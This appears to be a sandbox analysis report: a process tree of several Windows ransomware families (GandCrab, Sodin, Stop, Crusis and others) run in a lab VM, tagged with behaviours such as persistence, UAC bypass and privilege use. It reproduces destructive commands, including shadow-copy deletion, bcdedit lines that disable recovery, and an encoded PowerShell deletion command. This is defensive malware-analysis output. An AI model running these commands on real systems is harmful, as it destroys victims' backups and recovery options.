C:\Users\Admin\Desktop\00378\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exeHEUR-Trojan-Ransom.Win32.PolyRansom.gen-79257f7687a515e953bcab205bc308e20cb73a89f64f316c678c64206229778c.exe3⤵
- Modifies WinLogon for persistence
- Drops startup file
- Executes dropped EXE
- Enumerates connected drives
- Drops autorun.inf file
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:3936
-
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exeTrojan-Ransom.Win32.Blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3692 -
C:\Users\Admin\AppData\Local\Temp\lurwhzlcveb.exe"C:\Users\Admin\AppData\Local\Temp\lurwhzlcveb.exe" "c:\users\admin\desktop\00378\trojan-ransom.win32.blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe*"4⤵
- Modifies WinLogon for persistence
- UAC bypass
- Adds policy Run key to start application
- Disables RegEdit via registry modification
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Hijack Execution Flow: Executable Installer File Permissions Weakness
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- System policy modification
PID:4324 -
C:\Users\Admin\AppData\Local\Temp\ajhqekm.exe"C:\Users\Admin\AppData\Local\Temp\ajhqekm.exe" "-C:\Windows\system32\\zryqncncriuikukh.exe"5⤵
- Modifies WinLogon for persistence
- UAC bypass
- Adds policy Run key to start application
- Disables RegEdit via registry modification
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Adds Run key to start application
- Checks whether UAC is enabled
- Hijack Execution Flow: Executable Installer File Permissions Weakness
- Drops autorun.inf file
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:4328
-
-
C:\Users\Admin\AppData\Local\Temp\ajhqekm.exe"C:\Users\Admin\AppData\Local\Temp\ajhqekm.exe" "-C:\Windows\system32\\zryqncncriuikukh.exe"5⤵
- Modifies WinLogon for persistence
- UAC bypass
- Adds policy Run key to start application
- Disables RegEdit via registry modification
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Hijack Execution Flow: Executable Installer File Permissions Weakness
- Drops file in System32 directory
- Drops file in Windows directory
- System policy modification
PID:4128
-
-
-
C:\Users\Admin\AppData\Local\Temp\lurwhzlcveb.exe"C:\Users\Admin\AppData\Local\Temp\lurwhzlcveb.exe" "c:\users\admin\desktop\00378\trojan-ransom.win32.blocker.ckeq-ee96cebfbf4f65e11bd58a1a4b8463b48058466701282fd1ecf29742bda07828.exe"4⤵
- Modifies WinLogon for persistence
- UAC bypass
- Adds policy Run key to start application
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Drops file in Windows directory
- System policy modification
PID:5868
-
-
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Blocker.jzlx-61ce4f9766f5e50b03a1cc19a732253a6db9c93f76c3f1676a91c8c17f611bdd.exeTrojan-Ransom.Win32.Blocker.jzlx-61ce4f9766f5e50b03a1cc19a732253a6db9c93f76c3f1676a91c8c17f611bdd.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5020
-
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Crusis.dtk-6518ea1cc077c71291c07ddfe744ea7c8f65b6578a63f6a9e56db2af143bdd71.exeTrojan-Ransom.Win32.Crusis.dtk-6518ea1cc077c71291c07ddfe744ea7c8f65b6578a63f6a9e56db2af143bdd71.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:2004 -
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Crusis.dtk-6518ea1cc077c71291c07ddfe744ea7c8f65b6578a63f6a9e56db2af143bdd71.exeC:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Crusis.dtk-6518ea1cc077c71291c07ddfe744ea7c8f65b6578a63f6a9e56db2af143bdd71.exe4⤵
- Executes dropped EXE
PID:9960
-
-
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exeTrojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1652 -
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exeC:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Crusis.dzv-0df5f4794a0c890c3bef265b6c820baed2aced17fbf194149337a23ff1dc10ca.exe4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious behavior: RenamesItself
PID:5804 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"5⤵PID:5280
-
C:\Windows\system32\mode.commode con cp select=12516⤵PID:7312
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:1808
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"5⤵PID:7264
-
C:\Windows\system32\mode.commode con cp select=12516⤵PID:4964
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:5588
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"5⤵PID:2624
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"5⤵PID:6668
-
-
-
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.DigiPog.ep-6ba69449c4bddf553abcd497349a15b5636bcf649e31c1242959d980cb0ed1cc.exeTrojan-Ransom.Win32.DigiPog.ep-6ba69449c4bddf553abcd497349a15b5636bcf649e31c1242959d980cb0ed1cc.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3188
-
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Foreign.jxku-bf63837b5da7be5191e1c0b79a827ce8649971297f355845ae968cc44c7d9162.exeTrojan-Ransom.Win32.Foreign.jxku-bf63837b5da7be5191e1c0b79a827ce8649971297f355845ae968cc44c7d9162.exe3⤵
- Executes dropped EXE
- Identifies Wine through registry keys
- System Location Discovery: System Language Discovery
PID:4956 -
C:\Users\Admin\AppData\Roaming\Sun\Sunwin.exe"C:\Users\Admin\AppData\Roaming\Sun\Sunwin.exe"4⤵
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:3472
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\tmp5530a0ca.bat"4⤵
- System Location Discovery: System Language Discovery
PID:3988
-
-
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exeTrojan-Ransom.Win32.GandCrypt.jes-9cac4dfdc342e07a3feea28d56a11a2284544f7d63dbce610fe6ac0d03ac8044.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Enumerates connected drives
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:3172 -
C:\Windows\SysWOW64\nslookup.exenslookup nomoreransom.bit dns1.soprodns.ru4⤵
- System Location Discovery: System Language Discovery
PID:1928
-
-
C:\Windows\SysWOW64\nslookup.exenslookup emsisoft.bit dns1.soprodns.ru4⤵
- System Location Discovery: System Language Discovery
PID:5276
-
-
C:\Windows\SysWOW64\nslookup.exenslookup gandcrab.bit dns1.soprodns.ru4⤵
- System Location Discovery: System Language Discovery
PID:10220
-
-
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.PolyRansom.bvxo-f744e61e2b8b28ee3cf224e200d17b4706a946e9466437da2c3ccff253da0f9f.exeTrojan-Ransom.Win32.PolyRansom.bvxo-f744e61e2b8b28ee3cf224e200d17b4706a946e9466437da2c3ccff253da0f9f.exe3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4600
-
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exeTrojan-Ransom.Win32.Rack.itk-666a3daa2ef51e1b14e0abeddecce8ba836a27cc37781899c88a3b6f328d17e6.exe3⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops autorun.inf file
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of WriteProcessMemory
PID:4412 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"4⤵PID:2308
-
C:\Windows\system32\mode.commode con cp select=12515⤵PID:5068
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:4460
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 5404⤵
- Program crash
PID:3520
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 5484⤵
- Program crash
PID:4228
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 5764⤵
- Program crash
PID:2684
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 6284⤵
- Program crash
PID:860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 5884⤵
- Program crash
PID:2256
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 5604⤵
- Program crash
PID:4384
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 5604⤵
- Program crash
PID:1112
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 6964⤵
- Program crash
PID:5572
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 6844⤵
- Program crash
PID:5924
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 7844⤵
- Program crash
PID:6008
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 8244⤵
- Program crash
PID:3884
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 8324⤵
- Program crash
PID:5128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 8604⤵
- Program crash
PID:5588
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 7924⤵
- Program crash
PID:5800
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 7604⤵
- Program crash
PID:6700
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 8204⤵
- Program crash
PID:6108
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 8644⤵
- Program crash
PID:8668
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 7444⤵
- Program crash
PID:5392
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 6204⤵
- Program crash
PID:1940
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 8604⤵
- Program crash
PID:2672
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 7764⤵
- Program crash
PID:6704
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 8364⤵
- Program crash
PID:7988
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 7644⤵
- Program crash
PID:9244
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 8964⤵
- Program crash
PID:10904
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 8884⤵
- Program crash
PID:8904
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 8124⤵
- Program crash
PID:5448
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 8844⤵
- Program crash
PID:9700
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 9324⤵
- Program crash
PID:11148
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 9524⤵
- Program crash
PID:856
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 9604⤵
- Program crash
PID:8560
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 9364⤵
- Program crash
PID:6872
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 9764⤵
- Program crash
PID:6888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 9644⤵
- Program crash
PID:8680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 9684⤵
- Program crash
PID:6188
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 9484⤵PID:6952
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 10164⤵PID:7908
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 9964⤵PID:7568
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 9684⤵PID:3324
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 10404⤵PID:9636
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 10124⤵PID:6488
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 9924⤵PID:8852
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 9844⤵PID:9440
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 10044⤵PID:2112
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 11004⤵PID:9720
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 9604⤵PID:1420
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 10764⤵PID:5428
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 11684⤵PID:10940
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 9204⤵PID:8708
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 10564⤵PID:8900
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 11044⤵PID:8852
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 11324⤵PID:6288
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 10884⤵PID:7968
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 12204⤵PID:10788
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 10044⤵PID:7272
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 11124⤵PID:10800
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 10364⤵PID:1480
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 12404⤵PID:10532
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 10724⤵PID:2120
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 10204⤵PID:5620
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 12204⤵PID:8328
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 12044⤵PID:964
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 10004⤵PID:7160
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 9724⤵PID:7756
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 7644⤵PID:8388
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 9244⤵PID:10832
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 9684⤵PID:5436
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 11444⤵PID:7372
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 10484⤵PID:5088
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 10644⤵PID:9540
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 10524⤵PID:10672
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 9724⤵PID:10428
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 7644⤵PID:9680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 10004⤵PID:7368
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 10724⤵PID:6520
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 8804⤵PID:8412
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 11324⤵PID:7888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 8924⤵PID:6644
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 8964⤵PID:8432
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 9444⤵PID:8188
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"4⤵PID:8220
-
C:\Windows\system32\mode.commode con cp select=12515⤵PID:10980
-
-
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet5⤵
- Interacts with shadow copies
PID:10208
-
-
-
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exeTrojan-Ransom.Win32.Sodin.aak-4f3abc6a072b9e66a20dc5ee1dde6754beb1a3e175b2668fe540cca641c9969e.exe3⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops autorun.inf file
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2188 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3564
-
-
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Sodin.alx-3fc734a086c8d3aba757aa147a8d46a317e47bb0372f1fb2abf0a163a5d2938b.exeTrojan-Ransom.Win32.Sodin.alx-3fc734a086c8d3aba757aa147a8d46a317e47bb0372f1fb2abf0a163a5d2938b.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5072 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5072 -s 2364⤵
- Program crash
PID:1692
-
-
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Sodin.bi-4871bea79e651791fb79ef0bc46f61e728c41d27e7f5b8877d0958a8672f26ea.exeTrojan-Ransom.Win32.Sodin.bi-4871bea79e651791fb79ef0bc46f61e728c41d27e7f5b8877d0958a8672f26ea.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4536
-
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exeTrojan-Ransom.Win32.Sodin.g-9fa3a004576f357b5174dd1c29ef7d13005d996d5f9fb4b86d6d978d1a4a84ae.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:2304 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /All /Quiet & bcdedit /set {default} recoveryenabled No & bcdedit /set {default} bootstatuspolicy ignoreallfailures4⤵
- System Location Discovery: System Language Discovery
PID:6036
-
-
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Stop.gr-7b3eb4e7cad673ac4e9d3894466a15dedd45621d116e0222209b3ab98b6677c3.exeTrojan-Ransom.Win32.Stop.gr-7b3eb4e7cad673ac4e9d3894466a15dedd45621d116e0222209b3ab98b6677c3.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2864 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\7c663e5a-c668-44b3-88ed-139e79eff5db" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
PID:5856
-
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Stop.gr-7b3eb4e7cad673ac4e9d3894466a15dedd45621d116e0222209b3ab98b6677c3.exe"C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Stop.gr-7b3eb4e7cad673ac4e9d3894466a15dedd45621d116e0222209b3ab98b6677c3.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5540
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2864 -s 18204⤵
- Program crash
PID:5380
-
-
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Stop.hz-0bd793b8bee39280c76f9f4dd793a147d600f9234233833a81be0d87dbf9e482.exeTrojan-Ransom.Win32.Stop.hz-0bd793b8bee39280c76f9f4dd793a147d600f9234233833a81be0d87dbf9e482.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:1396 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 8604⤵
- Program crash
PID:280
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 8684⤵
- Program crash
PID:5772
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 9124⤵
- Program crash
PID:5940
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 9204⤵
- Program crash
PID:6108
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 10924⤵
- Program crash
PID:2404
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 11164⤵
- Program crash
PID:1400
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 13804⤵
- Program crash
PID:5808
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 16124⤵
- Program crash
PID:6456
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 16204⤵
- Program crash
PID:6984
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 16764⤵
- Program crash
PID:7780
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 17604⤵
- Program crash
PID:6456
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 17324⤵
- Program crash
PID:9256
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 17484⤵
- Program crash
PID:7940
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 16524⤵
- Program crash
PID:11004
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1396 -s 18644⤵
- Program crash
PID:8928
-
-
C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Stop.hz-0bd793b8bee39280c76f9f4dd793a147d600f9234233833a81be0d87dbf9e482.exe"C:\Users\Admin\Desktop\00378\Trojan-Ransom.Win32.Stop.hz-0bd793b8bee39280c76f9f4dd793a147d600f9234233833a81be0d87dbf9e482.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:9200 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 9045⤵
- Program crash
PID:9224
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 9325⤵
- Program crash
PID:5776
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 9405⤵
- Program crash
PID:7348
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 9205⤵
- Program crash
PID:6924
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 11245⤵
- Program crash
PID:10336
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 9200 -s 11885⤵
- Program crash
PID:8356
-
-
